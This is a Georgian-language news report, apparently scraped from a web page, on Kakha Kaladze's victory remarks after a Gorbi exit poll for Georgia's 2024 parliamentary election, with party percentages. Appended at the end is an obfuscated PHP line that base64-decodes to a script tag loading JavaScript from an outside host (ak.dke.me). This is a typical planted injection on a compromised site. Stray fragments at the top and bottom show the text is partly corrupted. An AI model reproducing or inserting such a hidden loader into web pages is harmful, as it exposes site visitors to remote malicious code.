celsiusi
ავერსი შნაიდერი

დღეს საქართველომ მთელ მსოფლიოს აჩვენა, რომ ჩვენ ვართ მშვიდობის მოყვარული ხალხი - ამის შესახებ „ქართული ოცნების“ გენერალურმა მდივანმა, კახა კალაძემ „გორბის“ ეგზიტპოლის შედეგების გაცნობის შემდეგ, მმართველი პარტიის ცენტრალურ ოფისში მოწყობილი სცენიდან მიმართვისას განაცხადა.

როგორც მან აღნიშნა, საქართველო არასდროს დაბრუნდება წარსულში.

„გილოცავთ, მეგობრებო! ძალიან მიხარია და პირველ რიგში, მინდა თითოეულ ამომრჩეველს ვუთხრა ძალიან დიდი მადლობა. დღეს საქართველომ მთელ მსოფლიოს აჩვენა, რომ ჩვენ ვართ მშვიდობის მოყვარული ხალხი. ჩვენ გვჭირდება მშვიდობა, განვითარება, წინსვლა. ყველამ უნდა გაიგოს, რომ საქართველო არასდროს დაბრუნდება წარსულში. საქართველო არასდროს დაბრუნდება იმ დროში, როცა ხალხს აწამებდნენ, ოჯახებს აუბედურებდნენ. გვინდა განვითარება, წინსვლა. როგორც ბიძინა ივანიშვილმა თქვა, ჩვენ ყველა ვიქნებით თქვენი, ქართველი ხალხის სამსახურში. კიდევ ძალიან მაგარ საქმეებს გავაკეთებთ, მაგარ პროექტებს განვახორციელებთ და საქართველოს აუცილებლად შევიყვანთ იმ მიმართულებით, რასაც ევროპა და ევროკავშირი ჰქვია. ოღონდ ღირსეულად, თავაწეულები და ღირსებით სავსე“,- განაცხადა კახა კალაძემ.

ცნობისთვის, ტელეკომპანია „იმედის“ დაკვეთით, „გორბის“ მიერ ჩატარებული ეგზიტპოლების მიხედვით, 2024 წლის საპარლამენტო არჩევნებში 18:30 საათის მონაცემებით, 5%-იანი ბარიერი 4-მა პარტიამ გადალახა. კერძოდ: „ქართულმა ოცნებამ“ ხმების - 56.1 % მიიღო; „კოალიცია ცვლილებისთვის“ – 12.6 %; „ერთიანობა ნაციონალურმა მოძრაობამ“ – 11.6 %; „ძლიერი საქართველო“ – 7.0 %; „გახარია საქართველოსთვის“ – 4.8 %; „გირჩი“ - 3.0 %;

82
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");